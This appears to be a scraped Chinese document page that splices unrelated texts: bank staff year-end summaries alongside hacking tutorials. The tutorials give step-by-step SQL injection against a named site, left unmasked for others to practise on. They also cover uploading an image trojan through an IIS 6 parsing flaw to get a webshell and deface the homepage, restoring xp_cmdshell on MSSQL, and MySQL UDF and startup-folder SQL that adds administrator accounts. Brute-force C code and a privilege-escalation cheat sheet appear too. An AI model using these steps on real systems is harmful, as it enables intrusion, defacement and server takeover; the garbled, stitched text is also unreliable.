(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救，结果认识了一找不到片的基友，00后的，，感觉顿时无语了…………聊天时，他说sqlmap 和burpsuite都很强大…………玩完sqlmap后，就一直想学burpsuite来着，，但是一直都没学，这几天才刚开始完的…………感觉确实强大，能够拦截，查看和修改网站流量………………不废话，开始

目标站，https://www.360docs.net/doc/3a13952804.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX)

点一链接，在网站后加 and 1=1 回车，页面正常，，加and 1=2 ,回车，不正常，，，判断存在sql

注入漏洞（当然存在啊，不然怎么做教程，只是说下如何判断注入）

然后order by 查询字段（是叫做字段吗，我对概念不清楚，虽然我为这还自学了mysql……暂且叫字段吧）

如图，12不正常，11正常，说明字段为11（11之前的都正常）

然后在地址后加入 union select 1，2，3，4，5，6，7，8，9，10，11 from admin,也就是访问

https://www.360docs.net/doc/3a13952804.html,/show_content.asp?id=1361 union select 1，2，3，4，5，6，7，8，9，10，11 from admin（别问我admin哪来的，，微软access数据库默认的表，也不能说是默认的吧，大多都是这样，下面的username和password也是这样），看图吧

看到2 3 没，爆出查询点了，，把2换成username，3换成password（当然2换成password，3为username也行），回车，如图

username为admin，，密码为MD5加密的值，拿去解密，如图

密码为jiexin 再去后台，默认为在网站后加/admin，，go go

登陆进去吧，go

然后，，没然后了

有些人到这了就会去改点新闻内容，啥的，不过都看不到网站源码，，有什么用…………只能改点东西而已

拿不到webshell的黑客不是好黑客……当然，这不是黑客，脚本小子而已，但还是得拿webshell啊，，继续

看看能不能传一句话木马（就是在上传图片的地方传一句话木马），如图，靠，不行

唉，看到iis6.0没，就从iis6.0的解析漏洞入手吧，有的后台不显示iis6.0，那就去站长工具查询吧，上图吧，真烦人

接下来的问题就是传马，但asp的格式传不了，也就是传一个jpg等图片格式的，让它被解析成asp运行

对了，我比较喜欢用图片马，就教下大家怎么做图片马吧，不需要任何软件，，如图，在记事本里写上一句话木马（密码为syx，可以随便改），随便准备一张图片，这两个要在同一目录，cmd里进入该目录，合成…………靠，暴露名字了，求大家不要人肉我啊，呜呜

看到没，生成3.png了，这就是图片马

祭出杀器，burpsuite，，不过burpsuite要在java环境下运行，windows下还得安装java环境，麻烦啊，还好kali自带，开kali 吧

我kali在虚拟机里……，把图片马弄进去（怎么弄就不说了，不然又要写一大堆东西），，然后输入命令burpsuite，回车，看图吧

burpsuite打开后，看图吧，不想打字，记下

这个默认是on，点下，变成off，看图

打开浏览器，设置下代理，端口，看图

这个地方填刚刚记下来的

ok，，去后台上传图片马吧，，这个时候，一定不要点开始上传

去burpsuite开启抓包，就是刚刚关了的，变成off的，点下，变成on，看图

on 了后，，在开始点上传，，再不管他了，去burpsuite吧，右键，如图操作，再去repeater

会看到这个，先用目录解析漏洞吧，加个目录1.asp，然后go

go了后出现右边的，复制地址，去主机访问吧，

靠，地址错了啊，还是目录错了，还是1.asp目录没建立起来，，查查其他图片目录吧

原来少了admin这个目录，靠，重新访问

麻痹，还是不行，那就是目录建立不起来，那就文件解析漏洞吧，如图改包，加上1.asp;. go后复制地址再访问，就是访问https://www.360docs.net/doc/3a13952804.html,/admin/job/1.asp;.201………….png

省略的内容自己看

哇靠，成功了，图片马运行成功了，看图吧

接下来连接木马了，拿webshell了，开中国菜刀，地址填上图片马的地址，密码刚刚写的，syx，脚本类型当然asp啊，添加

双击这个

看到没，这就是这个站的所有文件，我们可以随便对这个站做任何事了（不过不要这样，小心警察叔叔哦）

找到主页吧，悄悄装个逼，改了，不过先下载下来，等会还原

写个黑页吧，，不然·对不起自己自学的html了，我html5也就刚入门…………

看效果吧

靠，我太坏了，，，赶紧改回来，，，接下来看能不能提权服务器吧

靠，没权限………………好了，算了吧，就这样了

难怪我那找不到片的基友说提权就是提钱…………

行了，最后多说一句，这次准备打码的，不暴露网站地址的，但考虑到有些朋友需要找站练练手，就没打码

感觉这个站的漏洞还是比较多的，正好给我们提供了一个练习平台，分享给大家了

最后说句脏话，谁要是看了我这个教程而去把这个站黑了的，挂黑页不改回来，加广告，删网页，总之影响这个站的正常运行，我日你祖宗十八代

当然，你没看这个教程，你黑了这个站，我管不着…………

不说了，拜拜

银行后台员工年终总结怎么写

银行后台员工年终总结怎么写 银行后台员工年终总结1 20__年已过去，在新的1年中，我会1直保持“空杯心态”，虚心学习，继续努力，在今后的工作中，我还应努力做好以下几点： 1、建立爱岗敬业、忘我奉献的精神 比尔·盖茨说过这样1句话：“每天凌晨醒来，1想到所从事的工作和所开发的技术将会给人类生活带来的巨大影响和变化，我就会非常兴奋和激动。”那末是甚么成绩了他的事业?又是甚么创造了他的财富?是责任与豪情!我认为责任是1种人生态度，是珍视未来、爱岗敬业的表现，而豪情则是责任心的完善体现，它是成绩事业的强大气力，这份气力给予了我们充足的动力和勇气，让我们走在岗位的前列，为我们创造出1流的事迹，更加我们构筑了和谐的企业。责任增进发展，豪情成绩事业，我将从身旁的小事做起，从现在做起，将责任扛上双肩，将豪情填满我的工作，奋力拼搏，收获更多的精彩和奇迹! 2、加强业务知识学习、提升合规操作意识 身为网点1线员工，切实提高业务素质和风险防范能力，全面加强柜面营销和柜台服务，是我们临柜人员最为实际的工作任务，起着沟通顾客与银行的桥梁作用。因此，在临柜工作中，坚持要做1个“有心人”。 “没有规矩何成方圆”，加强合规操作意识，其实不是1句挂在嘴边的空话。有时，总是觉得有的规章制度在束缚着我们业务的办理，在制约着我们的业务发展，细细想来，其实不然，各项规章制度的建立，不是平空想象出来产物，而是在经历过许许多多实际工作经验教训总结出来的，只有依照各项规章制度办事，我们才有保护自

已的权益和保护广大客户的权益能力。 3、增强规章制度的履行与监督防范案件意识 规章制度的履行与否，取决于员工对各项规章制度的苏醒认识与熟练掌握程度，有规不遵，有章不遁是各行业之大忌，车行千里始有道，对规章制度的履行，就1线柜员而言，从内部讲要做到从我做起，正确办理每笔业务，认真审核每张票据，监督授权业务的合法合规，严格履行业务操作系统安全防范，抵制各种背规作业等等，做好相互制约，相互监督，不能碍于同事情面或片面寻求经济效益而背离规章制度而不顾。坚持至始至终地按规章办事。如此以来，我们的制度才得于实行，我们的资金安全防范才有保障。再好的制度，如果不能得到好的履行，那也将走向它的反面。 我相信，机遇总是垂青有准备的人，毕生学习才能不断创新。知识造就人材，岗位成绩梦想。有1种事业，需要青春和理想去寻求，有1种寻求需要付出艰辛的劳动和辛苦的汗水，我愿我所从事的招商银行永久年轻和壮丽，兴旺和发达! 银行后台员工年终总结2 由于领导的栽培和信任，我有幸在春节之前加入到___工作中来，自从进入___以来，在部门领导和老同志的关心、帮助下，努力做到爱岗敬业，恪尽职守，以务实的工作风格、坚定的思想信心和饱满的工作热忱，较好地完成了自己的本职工作和领导交办的各项工作。现简单总结： 1、努力改造思想，做好角色转变。由于我之前1直从事_ 工作，这是第1次接触管理的工作，这其中有个角色的转变，虽然_工作使我更加熟习我厂的技术参数、经济指标等，为以后的工作打下了良好的基础，但由于_工作的性质，使我在工作中养成了被动接受、

暴力破解程序

#include #include using namespace std; //破解当前密码，只适合4位纯数字的密码（异或加密）//// ////思想是，首先将原文用密码异或加密（异或加密特点是原文异或得到密文，密文异或得到原文，即解密，即原文异或加密两次便得到原文）， ////将得到的密文传入破解密码函数，异或解密成原文，如原文与实际原文相同，则表示密码正解，即破解成功，否则继续对比查找。/// string strp(const string & str,const string & strpw); string pjpw(const string & str,const string & strpw); int main() { string s1="this is a book."; string pass="9987"; string mw=strp(s1,pass);//原文加密并赋值给mw cout<<"密文是："<

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere 密码，登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM，破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP） c:\PHP(如果服务器支持PHP） 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升，好象不是很理想的 如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini，还有你的木马或者是VBS或者是什么，放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法！ 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过

银行营业部的年终工作总结

银行营业部的年终工作总结 200x年在行长室的领导下，各部门的帮助配合下，我们营业部全体员工认真学习、贯彻和落实各项规章制度。围绕市分行提出的“xxxxxx”，以服务工作为中心，结合营业部的工作实际，充分发挥营业部的服务窗口形象，做好全行的会计结算业务，为我行的全年工作做一份努力。 一、做好日常的服务结算工作 做为支行营业部，是一个大型综合网点，既是对外服务窗口，又是全行的业务处理中心，我们认为最重要的就是做好日常的业务处理，对外做好服务工作，对内做好结算工作。 1、节前节后是大量的现金投放与回笼，春节前为满足客户对现金的需要，从人民银行取2款1。5亿，春节一过，又向人民银行回笼了6500万现金。 2、对每年二次的学校收费我们在人员上、业务上给予最大的配合，对收回的现金及时清点入库，并及时开出行政事业收收费发票交回学校，将款项及时划入财政。 3、做好春节及5。1节期间的业务员、管库员及网点的安全保卫工作，考虑到营业部人员比以往减少，在节前即通知各网点要求做好入库钱钞的标准质量，以加快回笼资金的入库，减少

库存。 4、参加xxx大型演唱会的门票出售收款工作，并按排好相关的各项工作，保证在此期间的资金人员安全。 5、上半年协调三个部门做好网上银行的安装工作，并对相关企业进行业务及电脑知识上的培训，努力减少睡眠户的产生。至下半年，为更好地开展电子银行业务，在行长室关心下由营业部与公司业务部负责电子银行的安装服务工作，除了安装与业务知识宣传外，我们更做好对电子银行业务的落地处理工作，一年来未发生有任何的重复、错划或漏划等差错。 6、做好nova1。2、1。3、1。4版本的前期测试及投产工作。 7、配合xx支行做好对xx公司售房款的接款及清点工作。 8、做好本外币帐户清理及结转工作，在11月完成了帐务上收工作，同时在12月底我们成功完成与外管局的信息核对与纠错工作。 9、对电信及中油公司、石油公司的帐户信息调整工作（调为集团帐户）。 10、应电信局的邀请，由xxx对电信局全辖的出纳人员进行假币培训。 11、代理业务处理从个人业务部转到营业部处理，并将全

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，论坛有下，请自行搜索。插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文原创发布于＝华夏黑客同盟论坛＝（https://www.360docs.net/doc/3a13952804.html,）广告完毕。 把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录 显示错误信息： Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了， 当然我们还可以考虑其他的存储过程如：sp_oacreate和sp_oamethod来直接添加帐号，或者使用沙盘指令来提权， 但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上

传无法成功，这条路走不通了， 这时就考虑用到工具的文件管理功能了 看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

1433口令提权详细过程及错误修复

前段时间我朋友给我一个sopo的软件，说是扫1433口令的，而且猜解速度很快，我就找个服务器试了试，确实不错能扫到一些比较强点的口令。所以这段时间就玩了一下1433错误的恢复和提权。（有人可能会说了，这有啥好研究的，sa的权限直接加用户到超管不就成了吗。其实在sa权限下还是有很多的问题的大家可以捡有用的看没用的就略过吧） 下面来说sa下执行命令错误的几种情况： 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126（找不到指定模块。） 这种情况比较常见的，修复起来说简单也简单，但是有条件的。这种情况要是能列出目录（用sqltools v2.0就有列目录功能）恭喜你这个有80%的情况能修复了，如果能列目录，那么只要找到xplog70.dll的路径执行以下命令就可以了。 第一步 exec sp_dropextendedproc 'xp_cmdshell' （这个命令就是删除原有的cmdshell，因为已经出错了） 第二步 dbcc addextendedproc （“xp_cmdshell”,“c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll”） ;EXEC sp_configure 'show advanced options', 0 – 当然这是sql命令，用查询分析器执行。第二步里的c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll就是xplog70.dll的路径，这个路径是比较常见的，如果c盘没有可以找找其他盘符。 2、无法在库xpweb70.dll 中找到函数xp_cmdshell。原因：127（找不到指定的程序。） 其实这个跟上面的126是一样的就是cmdshell出错了只要找到备份的xplog70.dll按照上面的方法就能修复了。 3、未能找到存储过程‘masterxpcmdshell' 这种情况我看到网上的方法是： 第一步先删除： drop procedure sp_addextendedproc

银行服务管理工作总结

银行服务管理工作总结 导语：全力抓好检查制度的落实。今年我们坚持每月定期不定期的对网点进行检查，按照省分行的有关要求，以下xx为大家介绍文章，仅供参考! 篇一 20xx年，在市分行党委的正确领导下，我们认真贯彻落实省分行年初制定的“服务立行、服务兴行、服务出效益、服务是核心竞争力”的经营理念。多次召服务工作联系会议，专题研究和安排部署服务工作，通过集中整治，全行的服务工作有了明显的好转，客户投诉率明显下降。主要抓了以下几项工作。 一、主要工作措施 1、从年初开始，我们将服务工作作为全行的重点工作，结合我行的实际，及时制定了服务管理考核办法和各项具体实施规定，并认真贯彻执行；市分行制定了“内部承诺奖励处罚办法”，重新修订《服务工作检查考核办法》，《工会工作目标管理考核办法》、《客户投诉管理办法》等，使服务工作的管理制度更加完善，达到系统化、规范化。并汇集成册，下发各行组织员工进行学习和讨论。 2、市分行党委十分重视服务工作，在工作安排、检查、总结时都有服务工作的内容，由一把手负总责，分管领导专

门抓、主管部门具体抓，专业部门配合抓，初步形成全行齐抓共管的大服务格局，员工服务意识的提高和服务质量的进一步增强，在客户中产生良好影响，保证了各项业务健康有序的开展。在今年五月份，在市分行党委的高度重视下，专门召开了服务工作整改动员大会，xx支行班子成员和网点负责人共计100余人参加了会议。市分行党委书记xx同志作了重要讲话，xx部、xx部等部门的负责人作了承诺发言，向一线员工做出了郑重承诺，要求监督执行。网点负责人和员工代表也作了表态发言。会后我们将会议材料汇集成册下发执行，为全年服务工作的顺利开展起到较好推动作用。 3、服务工作纳入行长经营目标管理考核。年初、由市分行分管领导与各支行、城区各网点负责人签订服务工作目标责任书，明确考核的内容，强化服务的管理。并在绩效工资的发放中，专门将服务工作纳入考核，占比为10%，每季由服务办打分考核，与绩效工资挂钩奖罚兑现。有力地推动了优质文明服务工作的开展。 4、立足实际，建设网点。为了突出服务品牌，扩大xx 行影响，市分行对地处繁华路段、客流量较大的xx支行、xx支行和xx支行营业室，按照网点的标准进行了装修改造。安装了标准化户外标牌，分设了现金区、非现金区、个人理财区和客户休息区，使网点的布局多功能化，充分体现了人性化特点，及时适应了不同层次客户群体的服务需求，提升

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，论坛有下，请自行搜索。插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文原创发布于＝华夏黑客同盟论坛＝（https://www.360docs.net/doc/3a13952804.html,）广告完毕。 把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录 显示错误信息： Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了， 当然我们还可以考虑其他的存储过程如：sp_oacreate和sp_oamethod来直接添加帐号，或者使用沙盘指令来提权， 但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上

传无法成功，这条路走不通了， 这时就考虑用到工具的文件管理功能了 看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

银行后台柜员工作总结

银行后台柜员工作总结 篇一XX银行柜员工作总结 银行柜员年终总结 时间飞逝，光阴如梭。在忙碌而充实的工作中我们度过了意义非凡的XX年。回顾一年的所有工作令人欣喜。在支行各级领导的带领和分理处主任的指导及同事间共同努力下，我们积极学习业务知识，增加各项业务技能水平，认真履行工作职责，时刻谨记内控制度，圆满完成了全年各项工作指标，在思想觉悟、业务素质、操作技能、优质服务等方面都有了较好提高。现将一年的工作情况总结如下 一、主要工作内容及职责 本人于XX年6月入职，从事综合柜员一职。平日工作主要有柜面对私业务、对公业务、代发工资、反洗钱信息补录等。看似简单的操作，却需要平日多积累多学习操作流程，日益更新，专注、仔细、耐心对待每一笔业务的发生与审核，尤其是对公业务。一个月的支票处理量相对较大，为了减少退票率，也为了提高自己处理对公业务水平，我坚持对每一张票据各个要素进行认真审核，高标准严格要求自己及客户填写规范。伴随着每笔业务发生的同时，也将内部控制制度铭记于心，七步服务流程做到大方得体，将各项政策落到实处。 二、我的收获与成长 我很庆幸自己能够加入农商行，成为其中的一员，工作近一年的时间里，我的价值观和人生观都有个较大的改变，她让我相信人生一切皆有可能，只要自己肯努力创造。当然也只有能为企业做出奉献，才能实现自己的价值。首先，在一个工作团体里，大家要团结一致，互助进取，因为团结是取得互利共赢的前提；其次，做好自己的本职 工作是基本要求，作为一个柜员应该懂得自己该做什么，什么不能做，有主见有胆识；另外，客户是我们发展的主体，服务好客户是我们的职责，研究客户，通过对客户的研究从而达到了解客户的业务需求，力争使每一位客户满意，通过自身的努力来维护好每一位客户；当然，通过对业务的熟悉和对企业内部控制的了解之后，能为企业的一些潜在的漏洞或发展提出建设性的意见是我们份内之事，也是为企业能做的较好的贡献。 在市场竞争日趋激烈的今天，在具有热情的服务态度，娴熟的业务能力的同时，还必须要不断的学习，提高自己各方面的能力水平，才能向客户提供更高效率、更优质的服务。我行举办的各类培训和技能考核为我尽快提高业务技能提供了有力的保障。我始终积极参加各类培训，坚持认真听课，结合平时学习的规章制度和法律法规，努力提高着自己的业务能力水平。通过一段时间的工作，我深刻体会到银行是一个高风险的行业，办理每一笔业务都要注意到每一个小细节 和要素，它可以是一个复核、一个签章、一个客签名、一个手印、一个登记、一个交易码。一笔业务可能涉及到很多个细节问题，如果因为粗心大意，不用心想，漏掉一个没有做到，都有可能存在风险，就比如放贷款。细节不是儿戏，需要我们严肃对待。严格把守每一

银行后台年度工作总结文档2篇

银行后台年度工作总结文档2篇Annual work summary document of bank back office 汇报人：JinTai College

银行后台年度工作总结文档2篇 小泰温馨提示：工作总结是将一个时间段的工作进行一次全面系统的总检查、总评价、总分析，并分析不足。通过总结，可以把零散的、肤浅的感性认识上升为系统、深刻的理性认识，从而得出科学的结论，以便改正缺点，吸取经验教训，指引下一步工作顺利展开。本文档根据工作总结的书写内容要求，带有自我性、回顾性、客观性和经验性的特点全面复盘，具有实践指导意义。便于学习和使用，本文下载后内容可随意调整修改及打印。 本文简要目录如下：【下载该文档后使用Word打开，按住键盘Ctrl键且鼠标单击目录内容即可跳转到对应篇章】 1、篇章1：银行柜员20xx年度个人工作总结文档 2、篇章2：银行人员个人年度工作总结文档 导读：在将来迎来的一年中，我会继续努力，将我的工 作能力提高到一个新的档次，不辜负大家对我的期望，我会尽我所能的工作，帮助我行实现发展，相信我行的明天会更好! 以下是由小泰J.L为您整理推荐的银行年度工作总结，欢迎参考阅读。 篇一：银行人员年度个人工作总结 一、一年来的学习工作情况

1、在学习上更加注重“三个加强，三个提高”。 一是加强政治学习，不断提高自己的思想政治觉悟和政治理论水平。结合支行今年开展保持共h产j党员先进性教育活动，系统的、认真的学习了马克思主义的哲学、政治经济学理论读本、毛主席的为人民服务、邓小平建设有中国特色的社会理论和三个代表的重要思想，做学习笔记三万余字，写心得体会有10余篇，通过学习使自己的人生观、世界观、价值观得到了彻底的改造，自己的思想觉悟又得到了进一步的提高。 二是加强对业务知识的学习，不断提高自己的业务素质和业务能力。按照支行党组、行长的工作分工安排，我主要协助行长分管办公室、货币信贷统计股、外汇管理股的工作，这三个股室的工作业务性都比较强，为此，在平时的工作中，我注意测重加强对这个三股室业务知识的学习。利用业余时间学习了新的办公室公文起草、公文处理、科技方面的计算管理;货币信贷管理操作、征信管理、货币政策、金融稳定、信用环境建设、农村信用社改革;外汇管理的结、售汇管理、收汇核销的操作等等。从制度规定到操作程序、操作规程、风险控制等都有了进一步的了解。 三是加强了对管理知识的学习，提高自身对分管工作组织与协调的能力。管理是一门科学，也是门艺术，只有通过不

BurpSuite爆破密码

Burp Suite--- Intruder小技巧 作者：小冰50421961[AT] QQ [Dot] com 0x00 题外话 最近朋友送了我少女时代日本巡回演唱会蓝光高清限量版，太激动了！为此表示感谢，所以才有了下文。O(∩_∩)O哈哈~废话不多说，进入正题。 0x01 Intruder—暴力破解 安装要求： Java环境下载地址： https://www.360docs.net/doc/3a13952804.html,/j2se/downloads.html Burp Suite下载地址： https://www.360docs.net/doc/3a13952804.html,/burp/download.html 入门： 安装完成后可以双击可执行的JAR文件，如果不工作，你可以运行在命令提示符或终端输入。命令: Java –jar burpsuite_v1.4.jar 上篇文章对于burp的基本设置，已经说了很明了了，在这我就只提下就行咯。(*^__^*) 嘻嘻…… 配置过程如下： 代理端口配置如下图： 浏览器的配置如下图：

然后把拦截（intercept）功能关闭,因为我们这里不需要进行数据拦截 目标：登陆页面 思路过程：寻找登陆错误关键字—进行暴力破解 打开我们的目标如下图：

我们随意填写账户密码进行登陆，以此获取到登陆的错误信息如下图： 然后返回burp看提交和返回数据信息如下图：

发现我们浏览器所爆出的错误信息在数据包返回的页面中根本无法找到。我想这应该是要pro 版本 才能查看到数据吧 O(∩_∩)O 哈哈~ 开个玩笑！其实细心的童鞋会发现我上图我所标注的地方，HTTP 状态码302—重定向到另外一个url，我们看看第二个url 返回的内容如下图：

关于mysql提权方法总结

关于mysql提权方法总结 mysql是一种开放源代码的关系型数据库管理系统（rdbms），mysql数据库系统使用 最常用的数据库管理语言--结构化查询语言（sql）进行数据库管理。那么对于mysql提权的方法，站长们是否了解呢？专职优化、域名注册、网站空间、虚拟主机、服务器托管、vps 主机、服务器租用的中国信息港在这里为你做深入探讨！ mysql提权总结方法四则 一 UDF提权 这类提权方法我想大家已经知道了，我大致写一下，具体语句如下： 1 create function cmdshell returns string soname 'udf.dll' 2 select cmdshell('net user iis_user 123!@#abcABC /add'); 3 select cmdshell('net localgroup administrators iis_user /add'); 4 select cmdshell('regedit /s d:\web\3389.reg'); 5 drop function cmdshell; 6 select cmdshell('netstat -an'); 二 VBS启动项提权 1 create table a (cmd text); 2 insert into a values ("set wshshell=createobject (""wscript.shell"") " ); 3 insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " ); 4 insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " ); 5 select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动 \\a.vbs"; 先在webshell里连接上数据库,建立表，将VBS写入表里，然后导入启动项， 如果UDF提权不行的话也可以尝试下这个方法，前提是要有ROOT权限，后面有个,0表示不弹出CMD窗口，安静的运行。 还可以这样写: 1 create table a (cmd BLOB); 2 insert into a values （CONVERT(木马的 16进制代码,CHAR)); 3 select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe' 4 drop table a; 执行前3条语句，就可以将木马写进启动里了，前提是木马一定要是16进制，还有就是路径要是\\，因为windows会自动过滤掉一个\

银行 工作总结工作总结

银行工作总结工作总结 xx年对支行来讲，是辛勤耕耘的一年，是适应变革的一年，是开拓创新的一年，也是理清思路、加快发展的一年。在全体员工的共同努力下，**路支行坚持年初制订的工作思路，克服重重困难，团结一致，勇于开拓，在坚持规范经营、防范风险的前提下，以发展为主线，以利润为目标，以高品质、专业化服务为手段，积极扩展市场、创新产品、培育客户，实现了各项业务的全面、快速增长。现将xx 年工作情况汇报如下： 一、经营业绩 1、负债业务：截至11月底，我行全口径存款时点达到60978万元，较年初增长2358万元，其中对公存款余额达28614万元，较年初增长1525万元，储蓄存款时点余额32364万元，较年初增长833万元。截止11月底全年全口径日均存款余额为60625万元，较年初增长1020万元，其中对公存款日均已浮出水面，较年初正增长39万元，余额为27517万元;储蓄存款日均余额为33108万元，较年初新增981万元。 2、资产业务：截止11月底，我行贷款余额为40273万元，比年初新增万元。9月底，我行向**项目成功营销4亿元贷款，并分别于9月底投放2亿元、11月置换1亿元固定资产贷款，有效调整了我行的贷款结构，提高了利息收入水平。同时，我行今年在房地产项目贷款营销上也取得了较好的成绩，分别营销**、**两家优质房地产企业贷款各5000万元，为我行房地产金融业务打下了良好的基础。

全年累计收息达到634.26万元，资产质量良好。全年累计签发银行承兑汇票达13189万元，手续费收入达到6.6万元。 3、中间业务：今年我行对中间业务收入的认识有了较大的提高，并积极拓展中间业务收入的各种渠道，积极组织收入，提高收益水平。截止11月底，全年累计中间业务收入达172万元，比去年增速达到215%。其中10月份我行收到第一笔财务顾问收入7.5万元，以及国际结售汇收入2800元，开拓了新的中间业务空间。代理发售国债1651万元，基金1300万元，信托280万元，各类保险25万元，理财产品中间业务收入达到**万元。 4、国际业务：今年我行国际业务有了较大的进展。通过营销**科技、**等有进出口业务的贸易企业，我行仅10月和11月就完成对公企业国际结售汇82.59万元，国际结算量达到71.71万元。11月，经上级行批准我行开办外汇储蓄业务后，我行积极行动，对前台员工进行多次国际业务培训，悬挂宣传条幅进行业务推介，并在较短的时间内开始办理业务，为我行今后国际业务和外汇理财业务的发展奠定了坚实的基础。 5、电子银行业务：为了给客户提供方便快捷的高科技服务，减轻前台压力，今年我行对电子银行业务的发展提出了较高的目标。截止11月底，我行共发展企业网银客户14户，个人网银273户，CALLCENTER签约287户，网银结算量达到32393万元。 6、其他方面：xx年**路支行在结算服务、核算质量、安全生产等方面也取得了一定的成绩，实现全年安全生产无事故。同时也积

暴力破解密码C语言

#include"stdio.h" #include"time.h" #include"stdlib.h" #include"malloc.h" #include"string.h" int main() { char a[10],b[]={"000000"},c[]={"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTU VWXYZ"}; int d[6]; clock_t start,finish; double TheTimes; do { printf("请输入六位密码："); gets(a); if(a[6]=='\0') { break; } printf("ERROR\n" ); } while(1); start=clock(); while(1) { for(d[5]=0;d[5]<64;d[5]++) { b[5]=c[d[5]]; for(d[4]=0;d[4]<64;d[4]++) { b[4]=c[d[4]]; for(d[3]=0;d[3]<64;d[3]++) { b[3]=c[d[3]]; for(d[2]=0;d[2]<64;d[2]++) { b[2]=c[d[2]]; for(d[1]=0;d[1]<64;d[1]++) { b[1]=c[d[1]]; for(d[0]=0;d[0]<64;d[0]++)

{ b[0]=c[d[0]]; if(strcmp(a,b)==0) { printf("破解密码得："); puts(b); finish=clock(); TheTimes=(double)((finish-start)/CLOCKS_PER_SEC); printf("用时%f秒。\n",TheTimes); return(0); } } } } } } } } return(0); }

获得网站WEBSHELL权限的截图0

